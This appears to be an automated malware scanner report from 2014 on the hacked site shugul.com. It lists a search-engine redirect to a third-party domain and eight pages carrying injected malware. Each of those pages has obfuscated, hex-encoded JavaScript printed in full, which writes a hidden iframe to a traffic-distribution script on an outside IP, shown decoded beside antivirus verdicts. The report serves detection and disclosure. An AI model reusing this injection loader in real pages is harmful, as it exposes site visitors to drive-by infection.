Malware Scanner report for shugul.com

Malicious/Suspicious/Total URLs checked
8/0/33
8 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://padovarisorse.it/mambots/search/search.php
154 websites infected.

The website "shugul.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Malicious/Suspicious Redirects

Request | Server response | Status
URL: http://www.shugul.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: www.shugul.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 28 Sep 2014 05:36:24 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

Request | Server response | Status
http://www.shugul.com/
200 OK
Content-Length: 25942
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/js/main.js
200 OK
Content-Length: 14232
Content-Type: application/x-javascript
clean
http://www.shugul.com/js/noclick.js
200 OK
Content-Length: 624
Content-Type: application/x-javascript
clean
http://www.shugul.com/company/index.html
200 OK
Content-Length: 10185
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859fef0a50c(v51859fef0a554){ function v51859fef0a598 () {return 16;} return(parseInt(v51859fef0a554,v51859fef0a598()));}function v51859fef0a651(v51859fef0a695){ function v51859fef0a771 () {var v51859fef0a7b1=2; return v51859fef0a7b1;} var v51859fef0a6dc='';for(v51859fef0a727=0; v51859fef0a727<v51859fef0a695.length; v51859fef0a727+=v51859fef0a771()){ v51859fef0a6dc+=(String.fromCharCode(v51859fef0a50c(v51859fef0a695.substr(v51859fef0a727, v51859fef0a771()))));}return v51859fef0a6dc;} document.write(v51859fef0a651('3C696672616D65206E616D653D27623362303427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3331206865696768743D3930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='b3b04' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=31 height=90 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/company/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:26 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://padovarisorse.it/mambots/search/search.php
200 OK
Content-Length: 186
Content-Type: text/html
clean
http://padovarisorse.it/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://connect.facebook.net/en_US/all.js
200 OK
Content-Length: 163644
Content-Type: application/x-javascript
clean
http://www.shugul.com/company/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:27 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/portfolio/index.html
200 OK
Content-Length: 11843
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859ffa2dd08(v51859ffa2dd5a){ function v51859ffa2dd97 () {var v51859ffa2dde5=16; return v51859ffa2dde5;} return(parseInt(v51859ffa2dd5a,v51859ffa2dd97()));}function v51859ffa2de7b(v51859ffa2dec9){ var v51859ffa2dfb8=2; var v51859ffa2df17='';for(v51859ffa2df69=0; v51859ffa2df69<v51859ffa2dec9.length; v51859ffa2df69+=v51859ffa2dfb8){ v51859ffa2df17+=(String.fromCharCode(v51859ffa2dd08(v51859ffa2dec9.substr(v51859ffa2df69, v51859ffa2dfb8))));}return v51859ffa2df17;} document.write(v51859ffa2de7b('3C696672616D65206E616D653D2738333533393427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353034206865696768743D353034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='835394' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=504 height=504 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/portfolio/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/portfolio/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/about.html
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/services/index.html
200 OK
Content-Length: 21109
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859ffd1584e(v51859ffd15893){ var v51859ffd1592e=16; return(parseInt(v51859ffd15893,v51859ffd1592e));}function v51859ffd159e8(v51859ffd15a4b){ var v51859ffd15c82=2; var v51859ffd15a9a='';for(v51859ffd15b26=0; v51859ffd15b26<v51859ffd15a4b.length; v51859ffd15b26+=v51859ffd15c82){ v51859ffd15a9a+=(String.fromCharCode(v51859ffd1584e(v51859ffd15a4b.substr(v51859ffd15b26, v51859ffd15c82))));}return v51859ffd15a9a;} document.write(v51859ffd159e8('3C696672616D65206E616D653D2761626433333230323733366127207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353931206865696768743D3230207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='abd33202736a' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=591 height=20 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/services/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/services/../js/dhtmlwindow.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/services/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:28 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/whitepapers/index.html
200 OK
Content-Length: 14369
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51865da38fafd(v51865da38fb47){ var v51865da38fb8e=16; return(parseInt(v51865da38fb47,v51865da38fb8e));}function v51865da38fc15(v51865da38fc56){ var v51865da38fc98='';for(v51865da38fcd9=0; v51865da38fcd9<v51865da38fc56.length; v51865da38fcd9+=2){ v51865da38fc98+=(String.fromCharCode(v51865da38fafd(v51865da38fc56.substr(v51865da38fcd9, 2))));}return v51865da38fc98;} document.write(v51865da38fc15('3C696672616D65206E616D653D27386332306327207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353536206865696768743D3237207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='8c20c' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=556 height=27 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/whitepapers/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:29 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/whitepapers/../js/dhtmlwindow.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:29 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/whitepapers/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:29 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/newsletter/index.html
200 OK
Content-Length: 13473
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859ff699a30(v51859ff699a70){ var v51859ff699ab3=16; return(parseInt(v51859ff699a70,v51859ff699ab3));}function v51859ff699b59(v51859ff699b99){ function v51859ff699c57 () {return 2;} var v51859ff699bd8='';for(v51859ff699c16=0; v51859ff699c16<v51859ff699b99.length; v51859ff699c16+=v51859ff699c57()){ v51859ff699bd8+=(String.fromCharCode(v51859ff699a30(v51859ff699b99.substr(v51859ff699c16, v51859ff699c57()))));}return v51859ff699bd8;} document.write(v51859ff699b59('3C696672616D65206E616D653D27623227207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3639206865696768743D333134207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='b2' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=69 height=314 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/newsletter/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:29 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/newsletter/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:29 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/forward/index.html
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:30 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/choice.html
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:30 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/tools/index.html
200 OK
Content-Length: 14034
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51865d9fd92a0(v51865d9fd92f4){ return(parseInt(v51865d9fd92f4,16));}function v51865d9fd9428(v51865d9fd946c){ var v51865d9fd953a=2; var v51865d9fd94b2='';for(v51865d9fd94f5=0; v51865d9fd94f5<v51865d9fd946c.length; v51865d9fd94f5+=v51865d9fd953a){ v51865d9fd94b2+=(String.fromCharCode(v51865d9fd92a0(v51865d9fd946c.substr(v51865d9fd94f5, v51865d9fd953a))));}return v51865d9fd94b2;} document.write(v51865d9fd9428('3C696672616D65206E616D653D2733623627207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3534206865696768743D333033207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='3b6' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=54 height=303 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

http://www.shugul.com/tools/../js/main.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:30 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/tools/../js/dhtmlwindow.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:30 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2.asp?partner=netweather&tStyle=normal&logo=1&zipcode=AFR|SD|SU005|KHARTOUM|&lang=uke&size=9&theme=&metric=1&target=_self
200 OK
Content-Length: 8331
Content-Type: text/javascript
clean
http://www.shugul.com/tools/../js/noclick.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 28 Sep 2014 05:36:31 GMT
Location: http://padovarisorse.it/mambots/search/search.php
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
clean
http://www.shugul.com/contacts.html
200 OK
Content-Length: 11644
Content-Type: text/html
clean
http://www.shugul.com/index.html
200 OK
Content-Length: 25942
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));

Decoded script:


<iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
VIPRE
Heur.HTML.MalIFrame (v)

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=shugul.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shugul.com/

Result: shugul.com is not infected or malware details are not published yet.